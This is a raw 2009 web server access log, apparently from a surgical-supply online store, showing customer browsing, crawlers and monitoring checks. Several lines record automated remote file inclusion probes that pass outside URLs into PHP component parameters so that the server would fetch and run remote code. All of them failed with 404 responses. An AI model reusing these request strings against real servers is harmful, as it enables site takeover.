59.27.95.144 - - [04/Sep/2009:00:00:29 -0400] "GET /logs/access_log.Q109072200%20%20/components/com_forum/download.php?phpbb_root_path=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
119.63.193.55 - - [04/Sep/2009:00:01:52 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.jp/spider/)"
209.59.12.99 - - [04/Sep/2009:00:04:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
24.61.50.47 - - [04/Sep/2009:00:05:18 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L117B3E41009777006D9501J+M37+ENG HTTP/1.1" 200 67676 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
74.6.22.87 - - [04/Sep/2009:00:05:42 -0400] "GET /logs/access_log.Q109090100 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
24.61.50.47 - - [04/Sep/2009:00:05:57 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L117B40440E57B700686501K+M37+ENG HTTP/1.1" 200 68332 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B3E41009777006D9501J+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:06:06 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L117B40480037570083B501K+M37+ENG HTTP/1.1" 200 68635 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B40440E57B700686501K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:06:08 -0400] "GET /images/prev.gif HTTP/1.1" 200 253 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B40480037570083B501K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
110.45.146.223 - - [04/Sep/2009:00:06:15 -0400] "GET //main/index2.php?content=http://aflamsat.com/kernel/linux/id.txt??? HTTP/1.1" 404 214 "-" "libwww-perl/5.79"
110.45.146.223 - - [04/Sep/2009:00:06:15 -0400] "GET /logs/access_log.Q109072900//main/index2.php?content=http://aflamsat.com/kernel/linux/id.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
110.45.146.223 - - [04/Sep/2009:00:06:15 -0400] "GET /logs/error_log.Q109072700//main/index2.php?content=http://aflamsat.com/kernel/linux/id.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
110.45.146.223 - - [04/Sep/2009:00:06:15 -0400] "GET /logs/access_log.Q109072700//main/index2.php?content=http://aflamsat.com/kernel/linux/id.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
110.45.146.223 - - [04/Sep/2009:00:06:15 -0400] "GET /logs//main/index2.php?content=http://aflamsat.com/kernel/linux/id.txt??? HTTP/1.1" 404 219 "-" "libwww-perl/5.79"
24.61.50.47 - - [04/Sep/2009:00:06:46 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L117B40420D1787009C0501K+M37+ENG HTTP/1.1" 200 70730 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B40480037570083B501K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:07:01 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L117B40470437F700BAA501K+M37+ENG HTTP/1.1" 200 68532 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B40420D1787009C0501K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:07:55 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L117B404606B77700C83501K+M37+ENG HTTP/1.1" 200 68586 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B40470437F700BAA501K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:08:32 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L117B404A0FC7E700F98501K+M37+ENG HTTP/1.1" 200 68612 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B404606B77700C83501K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:08:49 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L117B414C06F79700113501K+M37+ENG HTTP/1.1" 200 68598 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B404A0FC7E700F98501K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
209.59.12.99 - - [04/Sep/2009:00:09:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
24.61.50.47 - - [04/Sep/2009:00:09:13 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L117B414C0F6727002AF501K+M37+ENG HTTP/1.1" 200 69993 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B414C06F79700113501K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:09:30 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L117B41430D8787004F8501K+M37+ENG HTTP/1.1" 200 68632 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B414C0F6727002AF501K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:09:54 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L117B41440C2787005CE501K+M37+ENG HTTP/1.1" 200 68622 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B41430D8787004F8501K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:10:08 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L117B414A0777170066B501K+M37+ENG HTTP/1.1" 200 68579 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B41440C2787005CE501K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:10:26 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L117B41480EA7D7007D5501K+M37+ENG HTTP/1.1" 200 68586 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B414A0777170066B501K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:10:39 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L117B41490F97470080D501K+M37+ENG HTTP/1.1" 200 68667 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B41480EA7D7007D5501K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:10:51 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L117B414603B7B70097D501K+M37+ENG HTTP/1.1" 200 68578 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B41490F97470080D501K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:11:01 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L117B41410DD73700A14501K+M37+ENG HTTP/1.1" 200 68626 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B414603B7B70097D501K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:11:23 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L117B414B0A374700AD2501K+M37+ENG HTTP/1.1" 200 68549 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B41410DD73700A14501K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:11:32 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L117B414F04F71700BA4501K+M37+ENG HTTP/1.1" 200 68578 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B414B0A374700AD2501K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:12:22 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L117B41480EA79700C32501K+M37+ENG HTTP/1.1" 200 68582 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B414F04F71700BA4501K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
211.218.40.180 - - [04/Sep/2009:00:12:28 -0400] "GET /logs/access_log.Q109070700//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.museoscout.com.ar/templates/did.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.79"
211.218.40.180 - - [04/Sep/2009:00:12:28 -0400] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.museoscout.com.ar/templates/did.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
211.218.40.180 - - [04/Sep/2009:00:12:29 -0400] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.museoscout.com.ar/templates/did.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
24.61.50.47 - - [04/Sep/2009:00:12:39 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L117B41470B575700F49501K+M37+ENG HTTP/1.1" 200 68587 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B41480EA79700C32501K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:12:55 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L117B42480E47B700079501K+M37+ENG HTTP/1.1" 200 68555 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B41470B575700F49501K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:13:15 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L117B42470C473700120501K+M37+ENG HTTP/1.1" 200 68575 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B42480E47B700079501K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:13:41 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L117B424A0057B70022D501K+M37+ENG HTTP/1.1" 200 68513 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B42470C473700120501K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
119.63.193.107 - - [04/Sep/2009:00:14:04 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.jp/spider/)"
209.59.12.99 - - [04/Sep/2009:00:14:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
24.61.50.47 - - [04/Sep/2009:00:14:12 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L117B42430F57F70048B501K+M37+ENG HTTP/1.1" 200 56614 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B424A0057B70022D501K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
211.218.40.180 - - [04/Sep/2009:00:14:34 -0400] "GET /logs/access_log.Q109070800//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.museoscout.com.ar/templates/did.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.79"
24.61.50.47 - - [04/Sep/2009:00:14:43 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B42430F57F70048B501K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:14:43 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B42430F57F70048B501K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:14:44 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:14:44 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:14:45 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:14:45 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:15:01 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76380 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:15:03 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:15:03 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:15:03 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:15:03 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:15:03 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:15:03 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:15:03 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:15:03 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:15:03 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:15:03 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:15:03 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:15:03 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:15:05 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:15:05 -0400] "GET /images/cat_dot.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
